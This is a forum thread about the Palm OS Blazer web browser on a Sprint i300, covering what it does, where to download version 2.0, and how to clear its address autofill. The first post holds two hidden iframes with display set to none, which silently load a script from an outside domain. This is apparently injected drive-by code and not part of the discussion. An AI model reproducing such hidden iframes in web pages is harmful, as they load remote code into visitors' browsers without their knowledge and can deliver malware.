+ Reply to Thread
Page 1 of 3 1 2 3 LastLast

What is Blazer?

I have been connecting to the web using the built in sprint browser and it works for me (i get my aol mail, etc). I am seen many threads referring to Blazer? What is it? Why do I need it? What will I be able to do differenly? If I download it from the sprint site, are there problems (eg lock-up or freezing?) Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Blazer is the best Palm OS web browser and allows you to visit the majority of websites out there. It can be downloaded by logging into your online account at www.sprintpcs.com and is highly recommended.

Administrator

Arrow

make sure its 2.0 as thats the latest one..

also its a color browser also. it can access more sites a little faster than the sprint web (and if you have it in the cache, its faster than that). it also renders the web site your viewing to the i300's screen so no need to scroll the screen..

this browser is available to any palm OS user but the one at the sprint site is designed for us sprint folks in mind... others will have to pay 20 bucks for the registered version of blazer..

so consider yourself among the elite!!

You may already be a blazer

If you've been using the application called "Browse WEB," you're already using Blazer (although perhaps not the latest version.) If you open it and select "About Browse WEB" it shows the Blazer logo.

Master

any software upgrades for i300?

Have there ever been any software upgrades for the i300? Just got one but wanted to make sure it had the latest software!

Thanks,
    Matt

Blazer 2.0 which is available to you via SprintPCS online is one you might want to make sure you've upgraded.

Master

where can I download the Blazer update?

Originally posted by GOLF
    Blazer 2.0 which is available to you via SprintPCS online is one you might want to make sure you've upgraded.
    Jumped onto SprintPCS's site and can't seem to find it. Do you happen to have a link or can you direct me to where this is?

It'll be on the top left corner of your account page but I don't think its functioning correctly right now. When the site is running 100% look for it. It says "get your software."

Lightbulb

Where there's a will there's a way:

http://205.137.195.84/selectpage.shtml

-Chris

Good post Chris. That link only offers the dialer upgrade and manual though. I think he was looking for the Blazer 2.0 DL.

Master

Thanks, got it.

After searching the Sprint site, I finally tripped across it.

Can't post a link because it is within the password protected portion of the site. Once you login, then you can dig and find a "software upgrades" section that contains the Blazer 2.0. It's towards the bottom and middle of the central page I believe.

can't find download link - "my phone error"

I can't find the download link anywhere once I've logged in... perhaps the problem is that under "my phone" it just says error.

Any ideas?

It'll be on the top left corner of your account page but I don't think its functioning correctly right now. When the site is running 100% look for it. It says "get your software."

This is the link for the Blazer upgrade friends.

Blazer 2.0

Question Blazer auto entry

When I use the blazer and go to enter a new website, it auto fills from websites past. This is a big pain. Is there any way to delete the autofills? Turn them off? Reset it?

Need help in Kansas

...it auto fills from websites past.
    What do you mean exactly? I don't know what you mean exactly but it sounds like your problem may have something to do with the cache.

Administrator

Arrow

clear the cache.

pull down menu> option> Browse WEB Preferences>advanced tab

personally i like it, but YMMV...

autofill

When I type "E" it autofills "ESPN.Com".

When I type "P" it autofills "Palmgear.com".

Sometimes this is fine except when I have several that are close, then I just want to reset it.

How do I do this?

Cache doesn't work

Clearing the cache has no effect.

The "clear button" is not on the advanced tab. The advanced tab only has clear cookies. This too does not work.

Administrator

Arrow

well, once you start inputting the link it will clear the screen to make room for your new entry...